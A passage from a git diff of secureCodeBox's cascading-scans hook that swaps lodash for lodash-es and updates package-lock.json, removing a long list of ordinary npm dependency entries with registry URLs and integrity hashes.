"^1.2.0" - } - }, - "end-of-stream": { - "version": "1.4.5", - "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", - "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", - "requires": { - "once": "^1.4.0" - } - }, - "es-define-property": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", - "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==" - }, - "es-errors": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", - "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==" - }, - "es-object-atoms": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", - "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", - "requires": { - "es-errors": "^1.3.0" - } - }, - "es-set-tostringtag": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", - "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", - "requires": { - "es-errors": "^1.3.0", - "get-intrinsic": "^1.2.6", - "has-tostringtag": "^1.0.2", - "hasown": "^2.0.2" - } - }, - "fast-fifo": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", - "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==" - }, - "form-data": { - "version": "4.0.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", - "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "es-set-tostringtag": "^2.1.0", - "hasown": "^2.0.2", - "mime-types": "^2.1.12" - } - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" - }, - "get-intrinsic": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", - "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", - "requires": { - "call-bind-apply-helpers": "^1.0.2", - "es-define-property": "^1.0.1", - "es-errors": "^1.3.0", - "es-object-atoms": "^1.1.1", - "function-bind": "^1.1.2", - "get-proto": "^1.0.1", - "gopd": "^1.2.0", - "has-symbols": "^1.1.0", - "hasown": "^2.0.2", - "math-intrinsics": "^1.1.0" - } - }, - "get-proto": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", - "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", - "requires": { - "dunder-proto": "^1.0.1", - "es-object-atoms": "^1.0.0" - } - }, - "gopd": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", - "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==" - }, - "has-symbols": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", - "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==" - }, - "has-tostringtag": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", - "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", - "requires": { - "has-symbols": "^1.0.3" - } - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "requires": { - "function-bind": "^1.1.2" - } - }, - "hpagent": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", - "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" - }, - "ip-address": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", - "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", - "requires": { - "jsbn": "1.1.0", - "sprintf-js": "^1.1.3" - } - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==" - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - }, - "jsbn": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", - "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" - }, - "jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" - }, - "jsonpath-plus": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", - "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", - "requires": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - } - }, - "math-intrinsics": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", - "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==" - }, - "mime-db": { - "version": "1.49.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==" - }, - "mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", - "requires": { - "mime-db": "1.49.0" - } - }, - "ms": { - "version": "2.1.3", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", - "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" - }, - "node-fetch": { - "version": "2.7.0", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", - "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", - "requires": { - "whatwg-url": "^5.0.0" - } - }, - "oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==" - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "requires": { - "wrappy": "1" - } - }, - "openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "requires": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - } - }, - "pump": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", - "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", - "requires": { - "end-of-stream": "^1.1.0", - "once": "^1.3.1" - } - }, - "rfc4648": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" - }, - "smart-buffer": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", - "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==" - }, - "socks": { - "version": "2.8.5", - "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", - "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", - "requires": { - "ip-address": "^9.0.5", - "smart-buffer": "^4.2.0" - } - }, - "socks-proxy-agent": { - "version": "8.0.5", - "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", - "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", - "requires": { - "agent-base": "^7.1.2", - "debug": "^4.3.4", - "socks": "^2.8.3" - } - }, - "sprintf-js": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", - "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==" - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "streamx": { - "version": "2.22.1", - "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", - "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", - "requires": { - "bare-events": "^2.2.0", - "fast-fifo": "^1.3.2", - "text-decoder": "^1.1.0" - } - }, - "tar-fs": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", - "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", - "requires": { - "bare-fs": "^4.0.1", - "bare-path": "^3.0.0", - "pump": "^3.0.0", - "tar-stream": "^3.1.5" - } - }, - "tar-stream": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", - "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", - "requires": { - "b4a": "^1.6.4", - "fast-fifo": "^1.2.0", - "streamx": "^2.15.0" - } - }, - "text-decoder": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", - "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", - "requires": { - "b4a": "^1.6.4" - } - }, - "tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "undici-types": { - "version": "6.21.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", - "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==" - }, - "webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "requires": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - }, - "ws": { - "version": "8.18.3", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", - "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", - "requires": {} - } } } diff --git a/hooks/cascading-scans/hook/hook.ts b/hooks/cascading-scans/hook/hook.ts index 545f5deeb8..f701bdc698 100644 --- a/hooks/cascading-scans/hook/hook.ts +++ b/hooks/cascading-scans/hook/hook.ts @@ -11,7 +11,7 @@ import { pickBy, forEach, isArray, -} from "lodash"; +} from "lodash-es"; import { isMatch as wildcardIsMatch } from "matcher"; import Mustache from "mustache/mustache.mjs"; diff --git a/hooks/cascading-scans/hook/package-lock.json b/hooks/cascading-scans/hook/package-lock.json index 76fabd0226..78f3d6a5f7 100644 --- a/hooks/cascading-scans/hook/package-lock.json +++ b/hooks/cascading-scans/hook/package-lock.json @@ -1,7 +1,7 @@ { "name": "@securecodebox/hook-cascading-scans", "version": "1.0.0", - "lockfileVersion": 2, + "lockfileVersion": 3, "requires": true, "packages": { "": { @@ -11,7 +11,7 @@ "dependencies": { "@kubernetes/client-node": "^1.3.0", "ip-address": "^10.0.1", - "lodash": "^4.17.21", + "lodash-es": "^4.17.21", "matcher": "^5.0.0", "mustache": "^4.2.0", "parse-domain": "^8.2.2" @@ -1115,10 +1115,11 @@ "node": ">=18.0.0" } }, - "node_modules/lodash": { + "node_modules/lodash-es": { "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" }, "node_modules/matcher": { "version": "5.0.0", @@ -1460,848 +1461,5 @@ } } } - }, - "dependencies": { - "@esbuild/aix-ppc64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.5.tgz", - "integrity": "sha512-9o3TMmpmftaCMepOdA5k/yDw8SfInyzWWTjYTFCX3kPSDJMROQTb8jg+h9Cnwnmm1vOzvxN7gIfB5V2ewpjtGA==", - "dev": true, - "optional": true - }, - "@esbuild/android-arm": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.5.tgz", - "integrity": "sha512-AdJKSPeEHgi7/ZhuIPtcQKr5RQdo6OO2IL87JkianiMYMPbCtot9fxPbrMiBADOWWm3T2si9stAiVsGbTQFkbA==", - "dev": true, - "optional": true - }, - "@esbuild/android-arm64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.5.tgz", - "integrity": "sha512-VGzGhj4lJO+TVGV1v8ntCZWJktV7SGCs3Pn1GRWI1SBFtRALoomm8k5E9Pmwg3HOAal2VDc2F9+PM/rEY6oIDg==", - "dev": true, - "optional": true - }, - "@esbuild/android-x64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.5.tgz", - "integrity": "sha512-D2GyJT1kjvO//drbRT3Hib9XPwQeWd9vZoBJn+bu/lVsOZ13cqNdDeqIF/xQ5/VmWvMduP6AmXvylO/PIc2isw==", - "dev": true, - "optional": true - }, - "@esbuild/darwin-arm64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.5.tgz", - "integrity": "sha512-GtaBgammVvdF7aPIgH2jxMDdivezgFu6iKpmT+48+F8Hhg5J/sfnDieg0aeG/jfSvkYQU2/pceFPDKlqZzwnfQ==", - "dev": true, - "optional": true - }, - "@esbuild/darwin-x64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.5.tgz", - "integrity": "sha512-1iT4FVL0dJ76/q1wd7XDsXrSW+oLoquptvh4CLR4kITDtqi2e/xwXwdCVH8hVHU43wgJdsq7Gxuzcs6Iq/7bxQ==", - "dev": true, - "optional": true - }, - "@esbuild/freebsd-arm64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.5.tgz", - "integrity": "sha512-nk4tGP3JThz4La38Uy/gzyXtpkPW8zSAmoUhK9xKKXdBCzKODMc2adkB2+8om9BDYugz+uGV7sLmpTYzvmz6Sw==", - "dev": true, - "optional": true - }, - "@esbuild/freebsd-x64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.5.tgz", - "integrity": "sha512-PrikaNjiXdR2laW6OIjlbeuCPrPaAl0IwPIaRv+SMV8CiM8i2LqVUHFC1+8eORgWyY7yhQY+2U2fA55mBzReaw==", - "dev": true, - "optional": true - }, - "@esbuild/linux-arm": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.5.tgz", - "integrity": "sha512-cPzojwW2okgh7ZlRpcBEtsX7WBuqbLrNXqLU89GxWbNt6uIg78ET82qifUy3W6OVww6ZWobWub5oqZOVtwolfw==", - "dev": true, - "optional": true - }, - "@esbuild/linux-arm64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.5.tgz", - "integrity": "sha512-Z9kfb1v6ZlGbWj8EJk9T6czVEjjq2ntSYLY2cw6pAZl4oKtfgQuS4HOq41M/BcoLPzrUbNd+R4BXFyH//nHxVg==", - "dev": true, - "optional": true - }, - "@esbuild/linux-ia32": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.5.tgz", - "integrity": "sha512-sQ7l00M8bSv36GLV95BVAdhJ2QsIbCuCjh/uYrWiMQSUuV+LpXwIqhgJDcvMTj+VsQmqAHL2yYaasENvJ7CDKA==", - "dev": true, - "optional": true - }, - "@esbuild/linux-loong64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.5.tgz", - "integrity": "sha512-0ur7ae16hDUC4OL5iEnDb0tZHDxYmuQyhKhsPBV8f99f6Z9KQM02g33f93rNH5A30agMS46u2HP6qTdEt6Q1kg==", - "dev": true, - "optional": true - }, - "@esbuild/linux-mips64el": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.5.tgz", - "integrity": "sha512-kB/66P1OsHO5zLz0i6X0RxlQ+3cu0mkxS3TKFvkb5lin6uwZ/ttOkP3Z8lfR9mJOBk14ZwZ9182SIIWFGNmqmg==", - "dev": true, - "optional": true - }, - "@esbuild/linux-ppc64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.5.tgz", - "integrity": "sha512-UZCmJ7r9X2fe2D6jBmkLBMQetXPXIsZjQJCjgwpVDz+YMcS6oFR27alkgGv3Oqkv07bxdvw7fyB71/olceJhkQ==", - "dev": true, - "optional": true - }, - "@esbuild/linux-riscv64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.5.tgz", - "integrity": "sha512-kTxwu4mLyeOlsVIFPfQo+fQJAV9mh24xL+y+Bm6ej067sYANjyEw1dNHmvoqxJUCMnkBdKpvOn0Ahql6+4VyeA==", - "dev": true, - "optional": true - }, - "@esbuild/linux-s390x": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.5.tgz", - "integrity": "sha512-K2dSKTKfmdh78uJ3NcWFiqyRrimfdinS5ErLSn3vluHNeHVnBAFWC8a4X5N+7FgVE1EjXS1QDZbpqZBjfrqMTQ==", - "dev": true, - "optional": true - }, - "@esbuild/linux-x64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.5.tgz", - "integrity": "sha512-uhj8N2obKTE6pSZ+aMUbqq+1nXxNjZIIjCjGLfsWvVpy7gKCOL6rsY1MhRh9zLtUtAI7vpgLMK6DxjO8Qm9lJw==", - "dev": true, - "optional": true - }, - "@esbuild/netbsd-arm64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.5.tgz", - "integrity": "sha512-pwHtMP9viAy1oHPvgxtOv+OkduK5ugofNTVDilIzBLpoWAM16r7b/mxBvfpuQDpRQFMfuVr5aLcn4yveGvBZvw==", - "dev": true, - "optional": true - }, - "@esbuild/netbsd-x64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.5.tgz", - "integrity": "sha512-WOb5fKrvVTRMfWFNCroYWWklbnXH0Q5rZppjq0vQIdlsQKuw6mdSihwSo4RV/YdQ5UCKKvBy7/0ZZYLBZKIbwQ==", - "dev": true, - "optional": true - }, - "@esbuild/openbsd-arm64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.5.tgz", - "integrity": "sha512-7A208+uQKgTxHd0G0uqZO8UjK2R0DDb4fDmERtARjSHWxqMTye4Erz4zZafx7Di9Cv+lNHYuncAkiGFySoD+Mw==", - "dev": true, - "optional": true - }, - "@esbuild/openbsd-x64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.5.tgz", - "integrity": "sha512-G4hE405ErTWraiZ8UiSoesH8DaCsMm0Cay4fsFWOOUcz8b8rC6uCvnagr+gnioEjWn0wC+o1/TAHt+It+MpIMg==", - "dev": true, - "optional": true - }, - "@esbuild/sunos-x64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.5.tgz", - "integrity": "sha512-l+azKShMy7FxzY0Rj4RCt5VD/q8mG/e+mDivgspo+yL8zW7qEwctQ6YqKX34DTEleFAvCIUviCFX1SDZRSyMQA==", - "dev": true, - "optional": true - }, - "@esbuild/win32-arm64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.5.tgz", - "integrity": "sha512-O2S7SNZzdcFG7eFKgvwUEZ2VG9D/sn/eIiz8XRZ1Q/DO5a3s76Xv0mdBzVM5j5R639lXQmPmSo0iRpHqUUrsxw==", - "dev": true, - "optional": true - }, - "@esbuild/win32-ia32": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.5.tgz", - "integrity": "sha512-onOJ02pqs9h1iMJ1PQphR+VZv8qBMQ77Klcsqv9CNW2w6yLqoURLcgERAIurY6QE63bbLuqgP9ATqajFLK5AMQ==", - "dev": true, - "optional": true - }, - "@esbuild/win32-x64": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.5.tgz", - "integrity": "sha512-TXv6YnJ8ZMVdX+SXWVBo/0p8LTcrUYngpWjvm91TMjjBQii7Oz11Lw5lbDV5Y0TzuhSJHwiH4hEtC1I42mMS0g==", - "dev": true, - "optional": true - }, - "@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "requires": {} - }, - "@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "requires": {} - }, - "@kubernetes/client-node": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", - "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", - "requires": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^22.0.0", - "@types/node-fetch": "^2.6.9", - "@types/stream-buffers": "^3.0.3", - "form-data": "^4.0.0", - "hpagent": "^1.2.0", - "isomorphic-ws": 